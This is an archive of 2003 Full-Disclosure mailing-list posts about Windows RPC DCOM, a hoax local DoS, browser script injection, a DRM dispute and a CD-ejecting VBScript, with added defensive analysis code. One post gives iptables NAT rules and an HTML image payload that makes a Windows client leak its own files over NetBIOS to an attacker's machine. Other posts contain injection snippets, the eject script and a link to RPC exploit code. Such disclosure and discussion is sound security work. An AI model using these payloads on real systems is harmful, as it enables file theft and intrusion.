I'm sorry, do I understand correctly when you say that the mechanism for verifying / managing signed e-mail seemed to be included within the e-mail itself -- in html, no less? Although I'm unfamiliar with certificate-based digitally-signed e-mail (I'm a pgp/gpg kind of guy) I can't help but be very suspicious.

Also, you mentioned that the machine will be used for business purposes and (directly?) connected to the internet. Might I recommend against using OE for e-mail? Mozilla Thunderbird is what I recommend for Microsoft folks.

take care,
Cael
[Full-Disclosure] About the supposed WinXp Local DoS ?
Hi there friends,

I've seen the supposed (and a little silly thing) Windows XP LOCAL DoS, and I was looking at the website. I'm not sure because I didn't try to test it, but it seems a completely false and funny joke.

Ok, but what are the original conditions of the system that the author of the report? It can be easily proved by providing the debug files of the executables involved because screenshots are not a good proof of concept, and, of course, things like "...click about 1000 times.." are commonly used in the everyday hoaxes.

If someone has tested it successfully, please tell me how to.

best regards,

--
0x00- Lorenzo Hernandez Garcia-Hierro
0x01- /* not csh but sh */
0x02- $ PATH=pretending!/usr/ucb/which sense
0x03- no sense in pretending!
PGP: Key fingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2  ID: 0x9C38E1D7
No Secure Root Group Security Research Team
http://www.nsrg-security.com
Re: [Full-Disclosure] Signed e-mail vs. turning off HTML mail under XP
> Good evening Yossarian,
>
> I'm sorry, do I understand correctly when you say that the mechanism for verifying / managing signed e-mail seemed to be included within the e-mail itself -- in html, no less? Although I'm unfamiliar with certificate-based digitally-signed e-mail (I'm a pgp/gpg kind of guy) I can't help but be very suspicious.

The problem is that by turning off HTML for e-mail as a security measure, you disable the correct use of digitally signed e-mail, which by design is a security measure. I cannot verify this behaviour for Outlook since I have no working system with said software.

I am not saying anything about the usefulness (or the opposite) of this signing technology or its alternatives, since everything that needs to be said about it is all over the Internet.

> Also, you mentioned that the machine will be used for business purposes and (directly?) connected to the internet. Might I recommend against using OE for e-mail? Mozilla Thunderbird is what I recommend for Microsoft folks.

Like I said, it is a new machine. Since my business IS security, I use on some systems what Joe Average uses. So I use MS boxes in daily routine work - it keeps me very up to date on threats. Sort of Honeypot thingie, but since it is partly production, I have to solve every prob encountered. Living dangerously on the web.

Top O' the morning - it is past midnight!
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
So I can assume no other information is posted, other than this site, to collaborate the RPC issue is not resolved, or should we all try to translate this site using the helpful hints, which they are?

BB

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of petard
Sent: Friday, October 10, 2003 4:40 PM
To: Brown, Bobby (US - Hermitage)
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Re: [Full-Disclosure] Signed e-mail vs. turning off HTML mail under XP
yossarian wrote:
> The problem is that by turning off HTML for e-mail as a security measure, you disable the correct use of digitally signed e-mail, which by design is a security measure.

Not the case, AFAIK -- S/MIME doesn't depend on how you view the document. At least w/Mozilla (currently in use here) S/MIME signatures are verified even though the HTML is not rendered.

--
"Well," Brahma said, "even after ten thousand explanations, a fool is no wiser, but an intelligent man requires only two thousand five hundred." - The Mahabharata
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
If this is at all really a new version of the rpc exploit that presents the attacker with the holy grail, then it is probably as bad as others have suggested. I haven't tested yet. But one thing I'd do is go through all of my windows systems and turn the RPC service off. Patching is one thing, but if you don't need the service, turn it off.

On Out!

On Fri, 2003-10-10 at 20:05, Bobby Brown wrote:
> So I can assume no other information is posted, other than this site, to collaborate the RPC issue is not resolved, or should we all try to translate this site using the helpful hints, which they are?
>
> BB
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of petard
> Sent: Friday, October 10, 2003 4:40 PM
> To: Brown, Bobby (US - Hermitage)
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Re: [Full-Disclosure] Local DoS in windows. [finally...]
Ok I have to admit! I use Windows XP Pro and it does work. We have tried it in other hardware platforms and it does work there too... but surprisingly! We got positive/negative results from all round the world!!! Can be, it works on a particular hardware type and doesn't... in some other.

--- Cael Abal [EMAIL PROTECTED] wrote:
> Steve Wray wrote:
>> How long do you have to hold the mouse button down for? I see no effect after about 30 seconds then I got bored... Tried in outlook and wordpad. In fact the 'ambient' CPU usage actually appeared to flatten out.
>
> Seems to me that users of FD and bugtraq have just been social engineered into wasting a couple man-hours 'testing' for this XP bug. Not quite Scaggs-worthy, granted, but it did manage to tie up Steve for half a minute. :)
>
> Cael
RE: [Full-Disclosure] Local DoS in windows.
well... that works on mine! and the computer that I have tested it on! ARE YOU USING WINDOWS XP PRO??? well... in 2-3 sec and you continuously click the button HELL IT WORK! YOU AREN'T A MICROSOFT EMPLOYEE ... ARE YOU???

--- Steve Wray [EMAIL PROTECTED] wrote:
> How long do you have to hold the mouse button down for? I see no effect after about 30 seconds then I got bored... Tried in outlook and wordpad. In fact the 'ambient' CPU usage actually appeared to flatten out.
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of bipin gautam
> Sent: Saturday, 11 October 2003 6:18 a.m.
> To: [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Local DoS in windows.
>
>> --- [Affected] ---
>> We have only tried it in windows Xp.
>>
>> --- [Bug Details] ---
>> http://www.geocities.com/visitbipin/win_dos.jpg
>> The image is self explanatory...
>>
>> --- [Description] ---
>> When you click any close, maximize or minimize button in windows Xp [no matter whether it's IE or a WordPad], surprisingly there is 100% CPU use at the instant and it continues until you release the button! Moreover, we've noticed if you continuously click the button for a long time [... not release it and hold ON] we've seen gradual/slow rise in page-file use too...!!!
>>
>> --- [Conclusion] ---
>> Hell... local DoS! That could be used by employees working at different terminal. (O;
>>
>> --- [Background Information] ---
>> This bug was originally discovered by hUNT3R, [myself] a member of 01 Security Submission. The vendor was notified via email.
>> http://www.ysgnet.com/hn
Re: [Full-Disclosure] [A bug!] Whom to blame, the HTML interpreter or the JavaScript compiler?
fine! I am stupid then! you will regret those words when you are using my exploits to. hell, search google! you will find a lot!
http://www.google.com.np/search?q=%22bipin+gautam%22+hUNT3R&ie=UTF-8&oe=UTF-8&hl=ne&btnG=%E0%A4%97%E0%A5%81%E0%A4%97%E0%A4%B2+%E0%A4%96%E0%A5%8B%E0%A4%9C%E0%A5%80

YOU THINK I AM STUPID CAUZ I COULDN'T EXPLAIN YOU WHAT I MEAN!!!

--- bipin gautam [EMAIL PROTECTED] wrote:
> well... I've PERSONALLY tried it with IE 6 AND Opera 7.11 and MOZILLa... for windows! well... for the other statistic I've been reported by friends/people like you! it does work!
>
> --- Florian Huber [EMAIL PROTECTED] wrote:
>> On Fri, 10 Oct 2003 10:38:59 -0700 (PDT) bipin gautam [EMAIL PROTECTED] wrote:
>>> --- [Effected] ---
>>
>> It's spelled "affected" ;P
>>
>>> All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, release DATE!
>>
>> Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5a) Gecko/20030813 Mozilla Firebird/0.6.1
>>
>> Definitely _not_ vulnerable...
[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Exploit code can be found here: http://www.securitylab.ru/40754.html

This code work with all security fixes. It's very dangerous.

----- Original Message -----
From: 3APA3A [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability
Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
This is the code you send:

    <html>
    <body>
    <p>THIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude</p>
    <script>
    document.write("<b>hUNTER Cyberdude</b></script><script>alert("it works 1"); alert("This works 2"); </script>
    </body>
    </html>

This gives an "Unterminated string constant" error followed by 2 alerts, which is exactly what it should do.

1. <script>document.write("<b>hUNTER Cyberdude</b></script>
   This gives the unterminated string constant; you're simply not closing your string. "<b>hUNTER Cyberdude</b>" never gets written out.

2. <script>alert("it works 1"); alert("This works 2"); </script>
   This is perfectly valid and thus executes.

I really don't see what you're trying to do or what the threat would be when you got whatever you're trying to do to work.

--jelmer

----- Original Message -----
From: bipin gautam [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 7:16 PM
Subject: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?

> --- [Effected] ---
> All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, release DATE!
>
> --- [Proof of concept] ---
> We have made a small script. Check it out,
> http://www.cyberdude.com.np/javascript.htm
>
> --- [Bug Details] ---
>     <html>
>     <body>
>     <p>THIS IS hUNT3R aka: Bipin Gautam</p>
>     <script>alert("<script>location.href='http://www.ysgnet.com';</script>")</script>
>     </body>
>     </html>
>
>     <html>
>     <body>
>     <p>THIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude</p>
>     <script>
>     document.write("<b>hUNTER Cyberdude</b></script><script>alert("it works 1"); alert("This works 2"); </script>
>     </body>
>     </html>
>
> --- [Description] ---
> The browser is letting you compile some-thing inside the alert function. Well, it should show it anyways without compiling the script tag as it is inside the quotation. But surprisingly, the output is different! We found the JavaScript compiler choked when we use the script tag inside a function like alert(); this also proves to be true for the document.write(); function. This means that this script is going to choke bad and you won't get any output but just the "); that's all.
>
> This script is working. It's not that it is not working. It works in the starting script tag, but when the html parses the script tag inside the document.write it goes mad coz nested scripting is not possible in HTML; the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad. But we can still insert the java script in it. What we did was, we inserted the closing tag of JavaScript </script> first, closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags now... So this is how we injected two alert tags in the java script.
>
> --- [Conclusion] ---
> This proves injection of JavaScript inside a JavaScript, making it available to use the current variable and change some static values predefined and even access other function without a problem. This was just a small demo; we use this simple script to just stop it from printing garbage on the screen.
>
> --- [Background Information] ---
> This bug was originally discovered by hUNT3R, [myself] a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new Level.
> http://www.ysgnet.com/hn
>
> ---[I want a JOB/scholarship... anyone??? - hUNT3R]---
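What jelmer describes is a property of the HTML tokenizer rather than of the JavaScript engine: once the parser is inside a script element it is in its "script data" state, where it knows nothing about JavaScript quoting and ends the element at the first "</script" it meets. The engine then only ever receives the text in front of that tag, which is why the first script body is an unterminated string and the second, a perfectly ordinary script, runs. The code below is an added example and not code from the thread or from either poster: it models that tokenizer state with a regular expression (assuming no "<!--" comments inside the script, which the real tokenizer treats specially), reports which of the resulting script bodies compile, and shows the escaping ("</" written as "<\/") that lets text containing "</script>" be placed inside an inline script without splitting it. The function names are mine.

```javascript
// Added example (not from the thread): how the HTML tokenizer splits the
// posted snippets, and how to embed text containing "</script>" safely.

// Simplified model of the tokenizer's "script data" state: the element body
// runs from the start tag to the first "</script" (case-insensitive), and the
// JavaScript quoting around it is irrelevant. Assumption: no "<!--" comments
// inside the script, which the real tokenizer treats specially.
function allScriptBodies(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Would the JS engine accept this body? (Compile only; nothing is executed.)
function parses(js) {
  try {
    new Function(js);
    return true;
  } catch (e) {
    return false;
  }
}

// Report, per script body the browser would see, whether it compiles.
function analyze(html) {
  return allScriptBodies(html).map((body) => ({ body, ok: parses(body) }));
}

// The defensive fix for data that must go inside an inline script: serialise
// it as a JS string and break every "</" into "<\/", which the JS engine reads
// as plain "</" but which never forms "</script" for the HTML tokenizer.
// "<!--" is broken the same way because it can open a comment in script data.
function jsStringForInlineScript(s) {
  return JSON.stringify(s)
    .replace(/<\//g, '<\\/')
    .replace(/<!--/g, '<\\!--');
}

// Constructed samples: the two documents posted in the thread.
const FIRST_POST = [
  '<html><body>',
  '<p>THIS IS hUNT3R aka: Bipin Gautam</p>',
  '<script>alert("<script>location.href=\'http://www.ysgnet.com\';</script>")</script>',
  '</body></html>',
].join('\n');

const REVISED_POST = [
  '<html><body>',
  '<p>THIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude</p>',
  '<script>',
  'document.write("<b>hUNTER Cyberdude</b></script><script>alert("it works 1"); alert("This works 2"); </script>',
  '</body></html>',
].join('\n');

// The same text embedded with the escaping above stays one valid script.
const SAFE_DOC = '<script>document.write(' +
  jsStringForInlineScript('<b>hUNTER Cyberdude</b></script><script>alert(1)</script>') +
  ')</script>';

// Stand-alone run: print what each document turns into.
for (const [name, doc] of [['first', FIRST_POST], ['revised', REVISED_POST], ['escaped', SAFE_DOC]]) {
  console.log(name, analyze(doc));
}
```

Run with `node`: the first post yields one body that fails to compile, the revised one yields a broken body followed by a valid one, and the escaped document yields a single valid body. The same rule applies to any server-side template that drops user data into an inline script: the JSON serialiser alone is not enough, the "</" sequence has to be broken as well.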
RE: [Full-Disclosure] Student faces suit over key to CD locks
You may write to prez of SunnNNNcoM "Peter Piper picked a peck of pickled peppers" here: [EMAIL PROTECTED] or view his gibberish under a woefully insecure flash infested website here: http://www.sunncomm.com/asktheprez/asktheprez.asp

Peter has addressed a carefully selected question about hacking and answered it like security is a barbie doll, a plaything. Perhaps Peter should not be in the security field judging by his childlike attitude, the miserably cartoonish website of his company and the simple fact that his entrusted chore of creating copy-protection mechanisms can be defeated by simply holding down a KEY.

I would suggest whoever has commissioned or contracted him to produce this farcical product immediately penalise not only this pathetic company but also him personally as an officer of that pathetic company.

Peter - you have insulted the entire security community with such a ridiculous product. Kindly refrain from entering this field and stick to something else. As a security guru, a multi-billionaire and a fund manager for a top 10 prime bank, I shall be instructing my people to downgrade your stock as a result of all of this. I am now even embarrassed to call me peter Peter. Shame on you!

Q: I've heard your technology can be hacked. Does that mean it won't work? (10/6/2003 7:37:18 PM)

A: Not at all. People who perform tests on MediaMax and declare it to be hackable don't understand why it's there in the first place. Let me tell you why:

1. All technology can be hacked by people wishing to make illegal and unauthorized use of the content owners' property. Prior to MediaMax, there was no alternative to the illegal copying and re-copying of music by users. Now with MediaMax on the CD, honest people have a way of honoring the artist's wishes regarding how and where the music property can be copied and shared.

2. MediaMax was designed to put a structure on the CD, itself, that empowers consumers to make licensed, legal and yes, limited copies of the music. The world has never seen anything like it before.

3. Thieves attempting to circumvent the technology for the purpose of re-distributing the music are breaking the law. Nothing will ever stop these thieves. They've rationalized the theft and they will always be looking for ways to cheat the system.

4. The goal of MediaMax was not to invent the holy grail (since one does not exist). The idea was to provide users with a way to legally use the CD, whether that be for copying or sharing the music. The difference between using our implanted technology or ripping the music for re-distribution is the difference between withdrawing money from your bank or robbing it.

5. If you owned technology that allowed you to transport the money from your local bank to your living room, that doesn't give you the right to do it. Music is much the same. As a consumer, you purchase the listening rights to the music on the CD, not the duplication rights.

6. No matter how much stealing (called "sharing" to make thieves feel better about themselves) goes on, it's still taking the copyrighted property of others and converting it to one's own use.

7. The current version of MediaMax is like any software technology in Version 1. The next version will make it tougher and tougher to circumvent. We have to start somewhere and progressive record companies like BMG and others understand this.

8. Meanwhile, honest people may, for the first time, enjoy the pleasurable experience of legal and licensed copying and sharing of their music - that's about 95% of us. That's who we designed MediaMax for.

9. So-called experts who grandstand by publishing MediaMax hacks don't get it. They seem to be born out of some Messiah complex hell-bent on saving the world from any technological attempt to protect artists and their property. It's as though they think that music is different from other real property. It isn't, and the people who subvert the protection that is afforded by MediaMax, no matter how trivial they deem that protection to be, are conspiring to commit theft against the wishes of the artists who created the musical property.

10. With MediaMax, we have a technology that plays on virtually every device and allows both copying and sharing, yet some think our technology is worthless based on how easy or hard it is to steal and convert the music property. It's as though they think that honest people will always steal if there's a way to get away with it.

Hackers think circumventing protection technologies is a game. It's not. It's a crime. I'm going to predict they've all got a wake-up call coming.

This is how we, a bunch of musicians and artists (and, yes, business people) at SunnComm feel about what we do.

Thanks for writing,
Peter
[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
If I am reading this correctly, in the sense is it being stated that with all patches and hotfixes systems are still vulnerable to some form of the RPC exploit as it relates to MS03-039? Thanks! Stone

3APA3A [EMAIL PROTECTED] 10/10/2003 10:48 AM
To: [EMAIL PROTECTED], [EMAIL PROTECTED], NNOV.RU [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Bad news on RPC DCOM vulnerability
Please respond to 3APA3A

Dear [EMAIL PROTECTED], There is some bad news on the RPC DCOM vulnerability: 1. A universal exploit for MS03-039 exists in the wild; PINK FLOYD is again actual. 2. It was reported by the exploit author (and confirmed) that Windows XP SP1 with all security fixes installed is still vulnerable to a variant of the same bug. Windows 2000/2003 were not tested. For a while only a DoS exploit exists, but code execution is probably possible. Technical details have been sent to Microsoft, waiting for confirmation. Dear ISPs, please instruct your customers to use the personal firewall in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles)
[Full-Disclosure] Mirror attacks on windows clients
Hi all, Last night I was debugging a NetBIOS connection between two machines and I remembered something really simple and stupid. I can't recall reading anything on the subject, but the fact is I didn't do any kind of research, so sorry if this is a known issue.

Mirroring NetBIOS connections from Windows clients. Lacking a better term, I'm calling this "mirror" because the idea is to put a Windows client talking NetBIOS with itself. I've prepared a simple iptables-based firewall on a Linux box, so that, 10.10.10.1 being the firewall's external interface and 10.10.10.2 the Windows client, these simple rules apply (may wrap):

-A PREROUTING -t nat -s 10.10.10.2 -d 10.10.10.1 -p tcp -m tcp --dport 139 -j DNAT --to-destination 10.10.10.2:139
-A POSTROUTING -o eth0 -j MASQUERADE

Basically, what this does (obviously) is mirror the connections to port 139 of the firewall from the Windows client to that same port on the Windows client, causing it in fact to be talking NetBIOS with itself. The NetBIOS connection is established and authenticated successfully, which allows me to sniff the (unencrypted) traffic on the Linux box. So, if the user on the Windows workstation visits a web page on my Linux box that has (for example) <IMG SRC="file://10.10.10.1/c$/boot.ini">, he will in fact be reading his own boot.ini, and I will be able to read it too by dumping the port 139 traffic on my firewall.

Now, this sounds really simple and stupid, and of course there's a strong possibility that I'm looking at this from a totally wrong perspective, if so I am sorry, but doesn't this look like it allows me to send an HTML mail to Windows/Outlook users and use this to read arbitrary files on their workstations (either by looking at the traffic, or coding a simple program that parses the NetBIOS traffic)? Best regards, Joao Gouveia [EMAIL PROTECTED]
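The workstation side of what Joao describes is an outbound NetBIOS session to an address outside its own LAN, which is exactly what an egress filter at the perimeter should refuse and log. As an added example (not code from the post), the Python below parses a few constructed iptables-style log lines, with an assumed field layout and an assumed trusted network of 192.168.1.0/24, and flags outbound TCP 139/445 from internal hosts to non-internal addresses such as the post's 10.10.10.1:

```python
import ipaddress
import re

# Networks the workstations may talk NetBIOS/SMB to (assumed for this
# example; a real deployment lists its own file-server LANs here).
TRUSTED_NETS = [ipaddress.ip_network("192.168.1.0/24")]

# NetBIOS session service (139) and direct-hosted SMB (445).
SMB_PORTS = {139, 445}

# iptables LOG-style packet fields; the syslog prefix is ignored (assumed layout).
LOG_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) "
    r"SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)"
)

# Constructed sample log: one workstation, four outbound connections.
# 10.10.10.1 is the firewall address from the post, treated as outside the LAN.
SAMPLE_LOG = """\
Oct 11 02:15:01 gw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.10 DST=192.168.1.20 PROTO=TCP SPT=1044 DPT=139
Oct 11 02:15:02 gw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.10 DST=10.10.10.1 PROTO=TCP SPT=1045 DPT=139
Oct 11 02:15:03 gw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.10 DST=203.0.113.5 PROTO=TCP SPT=1046 DPT=445
Oct 11 02:15:04 gw kernel: EGRESS IN=eth1 OUT=eth0 SRC=192.168.1.10 DST=10.10.10.1 PROTO=TCP SPT=1047 DPT=80
"""


def parse_line(line):
    """Return (src, dst, proto, sport, dport) or None if the line has no packet fields."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return (ipaddress.ip_address(m["src"]), ipaddress.ip_address(m["dst"]),
            m["proto"].upper(), int(m["spt"]), int(m["dpt"]))


def is_trusted(addr):
    """True when addr belongs to one of the networks SMB is allowed to reach."""
    return any(addr in net for net in TRUSTED_NETS)


def is_smb_leak(entry):
    """True when an internal host opens NetBIOS/SMB to an address outside TRUSTED_NETS.

    That connection is the precondition for the reflected session in the post:
    without it, nothing can be NATed back to the workstation.
    """
    src, dst, proto, _sport, dport = entry
    return proto == "TCP" and dport in SMB_PORTS and is_trusted(src) and not is_trusted(dst)


def scan(log_text):
    """Return (src, dst, dport) for every line that should be blocked or investigated."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_smb_leak(entry):
            hits.append((str(entry[0]), str(entry[1]), entry[4]))
    return hits


if __name__ == "__main__":
    for src, dst, dport in scan(SAMPLE_LOG):
        print(f"outbound SMB from {src} to {dst}:{dport} - block at the perimeter")
```

The same two-port rule, expressed as a drop of outbound TCP 139/445 to non-trusted networks, is the usual fix; the browser and mail client should additionally be prevented from auto-authenticating to remote UNC paths.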
RE: [Full-Disclosure] Student faces suit over key to CD locks
It has now been drawn to my attention that Peter has 'backed down' from the lawsuit. I fear that it is too late for that, dear Peter. As an officer of a public company it is unacceptable to throw around 'willy-nilly' lawsuits at whim. This affects not only the integrity of the company that you steer but also causes grave concern to the editors of leading internet publications. I am some articles ABOUT your proposed lawsuit are now only propagating through the media wires. To have you suddenly reverse this within hours is most selfish and all reporters will now have to scramble to fix the mess your whim has created. My suggestion now is two-fold - 1. you relinquish your stewardship immediately, you are not fit to run the ship any longer - 2. failing that we shall endeavour to purchase sufficient shares in the operation to toss you 'willy-nilly' by your ear, out the door. This is not the way we conduct corporate business in this day and age; you have sullied your company's already less than glistening reputation and made a mockery of both the security industry and the judicial system to which we only turn as a last resort. My decision is final.

On Fri, 10 Oct 2003 09:58:32 -0700 [EMAIL PROTECTED] wrote: You may write to prez of SunnNNNcoM Peter Piper picked a peck of pickled peppers here: [EMAIL PROTECTED] or view his gibberish under a woefully insecure Flash-infested website here: http://www.sunncomm.com/asktheprez/asktheprez.asp Peter has addressed a carefully selected question about hacking and answered it like security is a Barbie doll, a plaything. Perhaps Peter should not be in the security field judging by his childlike attitude, the miserably cartoonish website of his company and the simple fact that his entrusted chore of creating copy-protection mechanisms can be defeated by simply holding down a KEY.
I would suggest whoever has commissioned or contracted him to produce this farcical product immediately penalise not only this pathetic company but also him personally as an officer pathetic company. Peter - you have insulted the entire security community with such a ridiculous product. Kindly refrain from entering this field and stick to something else. As a security guru, a multi-billionaire and a fund manager for a top 10 prime bank, I shall be instructing my people to downgrade your stock as a result of all of this. I am now even embarrassed to call me peter Peter. Shame on you!

Q: I've heard your technology can be hacked. Does that mean it won't work? (10/6/2003 7:37:18 PM)
A: Not at all. People who perform tests on MediaMax and declare it to be hackable don't understand why it's there in the first place. Let me tell you why:
1. All technology can be hacked by people wishing to make illegal and unauthorized use of the content owners' property. Prior to MediaMax, there was no alternative to the illegal copying and re-copying of music by users. Now with MediaMax on the CD, honest people have a way of honoring the artist's wishes regarding how and where the music property can be copied and shared.
2. MediaMax was designed to put a structure on the CD, itself, that empowers consumers to make licensed, legal and yes, limited copies of the music. The world has never seen anything like it before.
3. Thieves attempting to circumvent the technology for the purpose of re-distributing the music are breaking the law. Nothing will ever stop these thieves. They've rationalized the theft and they will always be looking for ways to cheat the system.
4. The goal of MediaMax was not to invent the holy grail (since one does not exist). The idea was to provide users with a way to legally use the CD, whether that be for copying or sharing the music. The difference between using our implanted technology or ripping the music for re-distribution is the difference between withdrawing money from your bank or robbing it.
5. If you owned technology that allowed you to transport the money from your local bank to your living room, that doesn't give you the right to do it. Music is much the same. As a consumer, you purchase the listening rights to the music on the CD, not the duplication rights.
6. No matter how much stealing (called sharing to make thieves feel better about themselves) goes on, it's still taking the copyrighted property of others and converting it to one's own use.
7. The current version of MediaMax is like any software technology in Version 1. The next version will make it tougher and tougher to circumvent. We have to start somewhere and progressive record companies like BMG and others understand this.
8. Meanwhile, honest people may, for the first time, enjoy the pleasurable experience of legal and licensed copying and sharing of their music - that's about 95% of us. That's who we designed MediaMax for.
9. So-called experts who grandstand by publishing MediaMax hacks don't get it. They seem to be born out of some Messiah complex hell-bent on saving the world from any
RE: [Full-Disclosure] Local DoS in windows.
How long do you have to hold the mouse button down for? I see no effect after about 30 seconds, then I got bored... Tried in Outlook and WordPad. In fact the 'ambient' CPU usage actually appeared to flatten out.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of bipin gautam
Sent: Saturday, 11 October 2003 6:18 a.m.
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Local DoS in windows.
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
For us that cannot interpret the site, what more information can be provided? Bobby

-----Original Message-----
From: Alex [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

Exploit code can be found here: http://www.securitylab.ru/40754.html This code works with all security fixes. It's very dangerous.

- Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
For non-Russian speakers use http://babelfish.altavista.com/ -- Macroscape Solutions Inc. information technology foresight http://www.macroscape.com --

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Brown, Bobby (US - Hermitage)
Sent: Friday, October 10, 2003 3:34 PM
To: 'Alex'; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

For us that cannot interpret the site, what more information can be provided? Bobby

-----Original Message----- From: Alex [mailto:[EMAIL PROTECTED] Sent: Friday, October 10, 2003 1:09 PM Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

Exploit code can be found here: http://www.securitylab.ru/40754.html This code works with all security fixes. It's very dangerous.

- Original Message - From: 3APA3A [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability
[Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )
Hi friends, I'm not very happy with this; I have done an online test for ejecting CDs in MS Internet Explorer and I have tested it on all the computers of my house, but I was surprised when I checked that the last version of MSIE allows the execution of the script in the following security zones:
. LOCAL/INTRANET
. REMOTE/INTERNET
I tested it with default values and the exploit is executed; I edited the values and again it was executed. Am I discovering a new vulnerability in MS Internet Explorer? I'm not sure because there are lots of known holes in MSIE. Suggestions and help are completely welcome. The best regards,

PS: This is the code of the exploit:
-
<SCRIPT LANGUAGE=VBSCRIPT>
rem --
rem No Secure Root Group Security Research
rem Coder: Trulux / Lorenzo Hdez G-H
rem --
rem http://www.nsrg-security.com
rem --
rem - CREATE WINDOWS MEDIA PLAYER OBJECT
rem -
Set LARRYINTHEWILD = CreateObject("WMPlayer.OCX.7")
rem -
rem - SETTING SOME VARIABLES FOR EJECT CD UNITS
rem -
Set RIAAsaysBLAH = LARRYINTHEWILD.cdromCollection
rem -
rem - EJECTING ROUTINE
rem -
If RIAAsaysBLAH.Count >= 1 Then
    For i = 0 To RIAAsaysBLAH.Count - 1
        RIAAsaysBLAH.Item(i).Eject
    Next ' cdrom
End If
rem - END
</SCRIPT>
--
NOTE: I don't know if this is a known security hole; if this was discovered before, I'm sorry (and a little sad :-( ). You can test it online: http://test-zone.nsrg-security.com/browser/msie/cdrom
[Full-Disclosure] Excuse me , oh no! it was discovered before....;-(
Hi again dear friends, I'm a little sad about this: the vulnerability was discovered before. I did a little research on the wmplayer OCX and I saw it, but I didn't imagine the possibility that it had been discovered before. But why is it not patched? If you set the counter to lots of times... it is not a funny joke. The best regards, --- 0x00-Lorenzo Hernandez Garcia-Hierro 0x01-Security Consultant __ PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ** No Secure Root Group Security Research Team http://www.nsrg-security.com __
Re: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )
they fixed it with MS03-021 alongside some other issues http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/1765.html

- Original Message -
From: Lorenzo Hernandez Garcia-Hierro [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Friday, October 10, 2003 11:12 PM
Subject: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )
[Full-Disclosure] Bad news on RPC DCOM vulnerability
Dear [EMAIL PROTECTED], There is some bad news on the RPC DCOM vulnerability:
1. A universal exploit for MS03-039 exists in the wild; PINK FLOYD is again actual.
